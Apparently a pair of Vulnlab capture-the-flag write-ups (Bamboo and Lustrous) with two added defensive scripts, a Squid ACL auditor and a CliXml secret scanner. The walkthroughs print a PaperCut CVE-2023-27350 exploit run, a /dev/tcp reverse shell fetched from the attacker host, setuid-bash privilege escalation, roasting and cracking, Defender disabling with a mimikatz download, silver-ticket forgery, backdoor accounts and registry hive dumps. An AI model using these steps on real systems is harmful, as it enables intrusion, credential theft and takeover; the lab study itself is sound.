vulnlab-bamboo

vulnlab bamboo

nmap scan

# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http

# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds

squidscan

┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan                     
Port 22 found!
8916 / 65535 [------->____________________________________________] 13.60% 1659 p/sPort 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
9707 / 65535 [------->____________________________________________] 14.81% 1678 p/sPort 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s

 

Modified /etc/proxychains so that everything is routed through the Squid proxy on 3128:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128


┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
< 
* Connection #0 to host 10.10.79.83 left intact
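Added example (mine, not part of the writeup or of Squid): the proxy on 3128 was happy to fetch from the target's own port 9191, which is what let squidscan and the curl above reach the internal PaperCut service that nmap could not see. The small evaluator below models Squid's first-match http_access logic for src/dst/port ACLs and puts a permissive policy beside one built from the stock squid.conf denies (Safe_ports, to_localhost) plus a deny for the proxy's own address. The two configs, the ACL names and the external test addresses are constructed; 10.10.79.83 and 10.8.2.138 are the addresses from the page.

```python
"""Audit a squid.conf http_access policy against sample requests.

Only 'src', 'dst' and 'port' ACLs and the builtin 'all' are understood;
CONNECT tunnels, other ACL types and ACL options such as '-i' are not modelled.
"""
import ipaddress

# Weak policy (constructed): forwards anything anywhere, so a client can reach
# services on the proxy host that the firewall hides from the outside.
WEAK_CONF = """
acl localnet src 10.0.0.0/8
http_access allow all
"""

# Corrected policy (constructed, modelled on the stock squid.conf defaults):
# unsafe ports, loopback and the proxy's own address are denied first.
HARDENED_CONF = """
acl localnet src 10.0.0.0/8
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl proxy_self dst 10.10.79.83/32
acl Safe_ports port 80 443
http_access deny !Safe_ports
http_access deny to_localhost
http_access deny proxy_self
http_access allow localnet
http_access deny all
"""


def parse_squid_conf(text):
    """Return ({acl_name: (type, [values])}, [(action, [(negated, name), ...])])."""
    acls, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl" and len(parts) >= 4:
            name, acl_type, values = parts[1], parts[2], parts[3:]
            seen_type, seen_values = acls.setdefault(name, (acl_type, []))
            if seen_type != acl_type:
                raise ValueError(f"acl {name} redefined with a different type")
            seen_values.extend(values)          # repeated acl lines accumulate
        elif parts[0] == "http_access" and len(parts) >= 3:
            terms = [(v.startswith("!"), v.lstrip("!")) for v in parts[2:]]
            rules.append((parts[1], terms))
    return acls, rules


def _acl_matches(acls, name, src, dst, port):
    if name == "all":                           # builtin in Squid 3.2 and later
        return True
    acl_type, values = acls[name]
    if acl_type in ("src", "dst"):
        addr = ipaddress.ip_address(src if acl_type == "src" else dst)
        return any(addr in ipaddress.ip_network(v, strict=False) for v in values)
    if acl_type == "port":
        return port in {int(v) for v in values}
    raise ValueError(f"unsupported acl type {acl_type}")


def evaluate(conf, src, dst, port):
    """First matching http_access line wins.  With no match the default is the
    opposite of the last line; with no http_access lines at all Squid denies."""
    acls, rules = parse_squid_conf(conf)
    for action, terms in rules:
        # every ACL on the line must match (after applying any '!' negation)
        if all(_acl_matches(acls, name, src, dst, port) != negated
               for negated, name in terms):
            return action
    if not rules:
        return "deny"
    return "deny" if rules[-1][0] == "allow" else "allow"


if __name__ == "__main__":
    # The request from the writeup: the attacker host asking the proxy to fetch
    # port 9191 on the proxy host itself.
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, evaluate(conf, "10.8.2.138", "10.10.79.83", 9191))
```

With the hardened policy the 9191 request is refused by `deny !Safe_ports` before any allow rule is reached, and a request for port 443 on the proxy host is refused by the `proxy_self` ACL, while a normal request from the local network to an external site on 443 still passes.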

Exploiting CVE-2023-27350

wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py

 

1st: download s.sh to /tmp on the target

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

2nd: execute it

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" 
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

s.sh contains:

#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1

 

catch the shell

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ 
zsh: suspended  rlwrap nc -nlvp 9001
                                                                                                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$ 

Let's add our key to the authorized_keys file to get an SSH shell

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$

We now run linpeas and pspy on bamboo over SSH:

ssh -i papercut papercut@10.10.79.83

 

privesc

There is an authentication bypass script on Exploit-DB (https://www.exploit-db.com/exploits/51391) for the same CVE we started with.
We run it as follows and it prints the steps to follow:

➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

The PaperCut NG instance listens on port 9191, which is not reachable directly from outside (nmap only showed 22 and 3128), so we forward that port over SSH:

ssh -i papercut papercut@10.10.79.83 -L 9191:127.0.0.1:9191 -N

Browse to PaperCut through the forwarded port.

Click "Refresh servers" to trigger server-command; the script is writable by the papercut user but runs with root privileges, as the setuid bash below shows.


papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$ 

papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash-5.1# cd /root
bash-5.1# ls
root.txt  snap
bash-5.1# cat root.txt
VL{48<redacted>26}
bash-5.1# 

That’s all.

 

 

vulnlab-lustrous

vulnlab lustrous

Lustrous is a medium AD chain involving two machines, LusMS and LusDC. Anonymous FTP on LusMS exposes a set of usernames; one of them, ben.cox, does not require Kerberos pre-authentication, which allows AS-REP roasting. With remote access to LusMS, the local administrator password is found as a secure string that can be converted back to plaintext, which gives the SYSTEM account on that host. The web application on LusDC requires Kerberos authentication; since there is a service account with an SPN, kerberoasting yields svc_web's hash, which cracks. With that password a silver ticket is forged as tony.ward, a member of the Backup Operators group, whose password can be retrieved from the site. Using impacket-reg to retrieve the SAM, SYSTEM and SECURITY hives and then dumping NTDS.dit with the LusDC machine hash leads to Domain Admin.

Writeup:

Enumerating the anonymous FTP share finds 3 users.

After this we check which of them are AS-REP roastable (no pre-authentication required) and kerberoastable:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set


impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'

 

crack some hashes

The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt



Run BloodHound collection to find high-value targets:

bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp


$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


ServicePrincipalName    Name     MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc              svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             
http/lusdc.lustrous.vl  svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$<snip>


hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt


winrm to lusms.lustrous.vl

evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'

On Ben's Desktop we find admin.xml, an XML (CliXml) representation of a PSCredential object.

Following this blog post, we can recover the cleartext password from the file: the secure string is DPAPI-protected for the user who exported it, so it converts back in a session running as that user.


*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
</Props>
</Obj>
</Objs>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List


UserName       : Administrator
Password       : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain         :



*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 
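Added example (mine, not from the writeup): files like admin.xml are worth hunting for on your own hosts before someone else does. Export-Clixml stores a PSCredential password as an `<SS>` element holding a hex DPAPI blob, and every DPAPI blob starts with a version word and the fixed provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb, which is exactly the `01000000d08c9ddf0115d111...` prefix visible above. The scanner below parses the CliXml and reports such elements. The sample document is constructed: same shape as the page's admin.xml, real header, made-up blob body (it decrypts to nothing).

```python
"""Find DPAPI-protected secrets in exported PowerShell CliXml."""
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# DPAPI blob header: 4-byte version (1) followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian field order.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample (not the page's file): real header, made-up blob body.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0102030405060708</SS>
</Props>
</Obj>
</Objs>"""


def is_dpapi_blob(hex_text):
    """True if the hex string decodes to bytes that start with the DPAPI header."""
    try:
        raw = bytes.fromhex(hex_text.strip())
    except ValueError:
        return False
    return raw.startswith(DPAPI_HEADER)


def scan_clixml(text):
    """Return one finding per <SS> property: object type, UserName, DPAPI flag, size."""
    findings = []
    root = ET.fromstring(text)
    for obj in root.iter(PS_NS + "Obj"):
        tn = obj.find(PS_NS + "TN")
        type_names = [t.text for t in tn.findall(PS_NS + "T")] if tn is not None else []
        props = obj.find(PS_NS + "Props")
        if props is None:
            continue
        # only direct children of Props, so nested objects are not double-counted
        username = next((p.text for p in props
                         if p.tag == PS_NS + "S" and p.get("N") == "UserName"), None)
        for ss in props.findall(PS_NS + "SS"):
            blob = ss.text or ""
            findings.append({
                "type": type_names[0] if type_names else "?",
                "property": ss.get("N"),
                "username": username,
                "dpapi": is_dpapi_blob(blob),
                "blob_bytes": len(blob) // 2,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_clixml(SAMPLE_CLIXML):
        print(finding)
```

A finding with `dpapi` set means the secret is bound to the exporting user's DPAPI master key; a secure string exported with `ConvertFrom-SecureString -Key` instead is AES-encrypted and will not carry this header, so the scanner reports it with `dpapi` false but still lists the property.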

 

Log on as Administrator and make ben.cox an admin:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{40<redacted>48}

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.

Look around

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ xfreerdp  /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx

Start Edge, log in to https://lusdc.lustrous.vl as ben.cox
and find the secure note.

We also have the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets

We disable Windows Defender and upload mimikatz in our current PowerShell session, where we can store a new ticket for the Administrator account:

set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe

Then we generate a PowerShell reverse shell with mkpsrevshell.py:

 

python3 mkpsrevshell.py 10.8.2.138 443


└─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e <snip>"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
Password:
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp

 

 

All in one

PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519 
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt      
Service   : http
Target    : lusdc.lustrous.vl
Lifetime  : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

PS C:\temp> whoami
nt authority\system
PS C:\temp> hostname
LusMS
PS C:\temp> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>	Client: tony.ward @ lustrous.vl
    Server: http/lusdc.lustrous.vl @ lustrous.vl
    KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 9/21/2024 18:04:01 (local)
    End Time:   9/19/2034 18:04:01 (local)
    Renew Time: 9/19/2034 18:04:01 (local)
    Session Key Type: RSADSI RC4-HMAC(NT)
    Cache Flags: 0 
    Kdc Called: 
PS C:\temp> 

PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

 

First we need the NTLM hash for the service account (svc_web):

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717

The following wmic command can be used to get the SID of tony.ward (or we use BloodHound for this):

C:\Windows\system32>wmic useraccount where name='tony.ward' get sid 
SID S-1-5-21-2355092754-1584501958-1513963426-1114

We then use the NTLM hash as the /rc4 parameter:

kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http  /ptt

and request the target website:

iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

This gives us u

We had better not use an Administrator account for this, meaning we need another target; in our case we craft a silver ticket for tony.ward:


kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt

In an administrative cmd prompt:

C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user "lustrous\ben.cox" ...

C:\Windows\system32>

Then run mimikatz:

c:\temp>mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : http
Target    : LusDC.lustrous.vl
Lifetime  : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz # exit
Bye!

c:\temp>


c:\temp>klist

Current LogonId is 0:0x4900d

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content



<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>

<div class="table">
 
                                    <td>
                                        Password Reminder
                                    </td>
                                    <td>
                                        U_cPVQ<redacted>0i1X
                                    </td>
                                    <td>
                                        lustrous_tony.ward
                                    </td>
                                    <td>
                                        <a class="btn btn-danger" href="/Internal
        </table>
        <input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
    </div>
        <hr />
        <footer>
            <p>&copy; 2024 - SNotes</p>
        </footer>
    </div>
</body>
</html>

PS C:\temp>


PRIVESC

 

Logged in as Ben, right-click PowerShell and run it as user tony.ward:

PS C:\Users\ben.cox> whoami
lustrous\tony.ward

PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: -2147483648
   \_ Inherited: False

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: 268435456
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: FullControl
   \_ Inherited: False

[*] Identity: BUILTIN\Backup Operators
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
PS C:\temp>



┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl                        

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd windows\tasks
# ls
drw-rw-rw-          0  Sat Jul 27 13:51:14 2024 .
drw-rw-rw-          0  Sat May 27 20:32:06 2023 ..
-rw-rw-rw-      45056  Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw-      28672  Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw-   16965632  Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw-          6  Sat Jul 27 11:50:13 2024 SA.DAT
# mget *
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[*] Downloading SA.DAT
# 

Or do it this way:

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
